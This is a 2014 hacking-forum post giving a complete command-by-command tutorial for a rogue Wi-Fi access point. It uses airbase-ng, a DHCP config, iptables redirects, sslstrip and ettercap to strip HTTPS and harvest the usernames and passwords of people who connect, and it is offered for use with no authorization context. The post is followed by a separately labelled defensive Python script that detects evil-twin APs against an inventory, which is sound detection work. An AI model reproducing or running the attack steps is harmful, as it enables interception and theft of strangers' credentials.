Hackerszone
Rogue AP MiTM Attack (Fake AP)


Post by kyle5647 Fri Jun 13, 2014 4:46 pm

Introduction

This is what Wikipedia says: A rogue access point is a wireless access point that has either been installed on a secure company network without explicit authorization from a local network administrator, or has been created to allow a hacker to conduct a man-in-the-middle attack.

Basically, a rogue AP is a fake AP which you can use to do MiTM attacks. If you don't know what those are -> [You must be registered and logged in to see this link.]

This method uses a dhcp server. There are other methods which I will cover in another tutorial.

So let's start.

What do you need?
1. Either a VM running Kali or a PC/Laptop running it
2. 2x Network adapter (or a wired connection)
3. One of them must support both monitor and master mode

What do you need to do?
Configure the DHCP Server

1. Open terminal
2. route -n (note the gateway; I'll assume the GW is 192.168.0.1)
3. apt-get install dhcp3-server (install the DHCP server)
4. nano /etc/dhcpd.conf (configure the DHCP server)
5. Type or paste the following into your .conf
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
    option routers 192.168.1.1;
    option subnet-mask 255.255.255.0;
    option domain-name "name you want the router to be called";
    option domain-name-servers 192.168.1.1;
    range 192.168.1.2 192.168.1.40;
}
6. Hit ctrl+x then y then enter (save the file)

Start the AP
1. airmon-ng (check the network adapter; I'll assume it's wlan0)
2. airmon-ng start wlan0 (start monitor mode = mon0)
3. airbase-ng -c 11 -e "name you want it to be called" mon0
4. DON'T CLOSE THE TERMINAL

Configure the Tunnel Interface
1. Open Terminal.
2. ifconfig at0 192.168.1.1 netmask 255.255.255.0 (set ip and netmask)
3. ifconfig at0 mtu 1400 (set MTU)
4. route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 (add routing table)
5. echo 1 > /proc/sys/net/ipv4/ip_forward (enable IP forwarding)
6. iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.1 (entering iptables rules)
7. iptables -P FORWARD ACCEPT (accept forwarding)
8. iptables --append FORWARD --in-interface at0 -j ACCEPT
9. iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
10. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

Start DHCP Server
1. dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
2. /etc/init.d/isc-dhcp-server start

Starting SSL Strip
1. sslstrip -f -p -k 10000
2. DON'T CLOSE TERMINAL

Harvest
1. Open terminal
2. ettercap -p -u -T -q -i at0 (start ettercap)

Congrats! If you haven't run into any errors you should be able to get all user/pass that are being sent over the AP.
kyle5647
Member

Posts : 40
Join date : 2014-04-08
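
A defender-side check for the kind of fake AP started in the "Start the AP" step, as an added example that is not part of the original post: it compares Wi-Fi scan results against an inventory of authorized access points and flags beacons that reuse a managed SSID with an unknown BSSID, a different security mode, or an unexpected channel. The airbase-ng command in the post passes only a channel and an ESSID, with no encryption options. The names Beacon, INVENTORY, SAMPLE_SCAN and find_rogue_aps, and all SSIDs and MAC addresses, are hypothetical or constructed for illustration.

```python
"""Flag likely rogue / evil-twin access points in a Wi-Fi scan (added example)."""
from dataclasses import dataclass

@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str
    channel: int
    security: str  # e.g. "open", "wpa2-psk", "wpa2-eap"

# Hypothetical inventory of the organisation's real APs (constructed values).
INVENTORY = {
    "CorpWiFi": {
        "bssids": {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"},
        "security": "wpa2-eap",
        "channels": {1, 6, 36},
    },
}

def find_rogue_aps(beacons, inventory=INVENTORY):
    """Return (beacon, reasons) for beacons using a managed SSID that deviate from inventory."""
    findings = []
    for b in beacons:
        entry = inventory.get(b.ssid)
        if entry is None:
            continue  # SSID is not one we manage; out of scope for this check
        reasons = []
        if b.bssid.lower() not in entry["bssids"]:
            reasons.append("unknown BSSID")
        if b.security != entry["security"]:
            reasons.append(f"security {b.security!r}, expected {entry['security']!r}")
        if b.channel not in entry["channels"]:
            reasons.append(f"unexpected channel {b.channel}")
        if reasons:
            findings.append((b, reasons))
    return findings

# Constructed scan results, not captured from a real network.
SAMPLE_SCAN = [
    Beacon("CorpWiFi", "aa:bb:cc:00:00:01", 6, "wpa2-eap"),    # matches inventory
    Beacon("CorpWiFi", "02:11:22:33:44:55", 11, "open"),       # same SSID, nothing else matches
    Beacon("CoffeeShop", "de:ad:be:ef:00:01", 11, "open"),     # unmanaged SSID, ignored
    Beacon("CorpWiFi", "AA:BB:CC:00:00:02", 36, "wpa2-psk"),   # known BSSID, wrong security
]

if __name__ == "__main__":
    for beacon, reasons in find_rogue_aps(SAMPLE_SCAN):
        print(f"{beacon.ssid} {beacon.bssid} ch{beacon.channel}: {'; '.join(reasons)}")
```

The security-mode comparison matters because a BSSID match alone does not prove the beacon comes from the authorized hardware.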
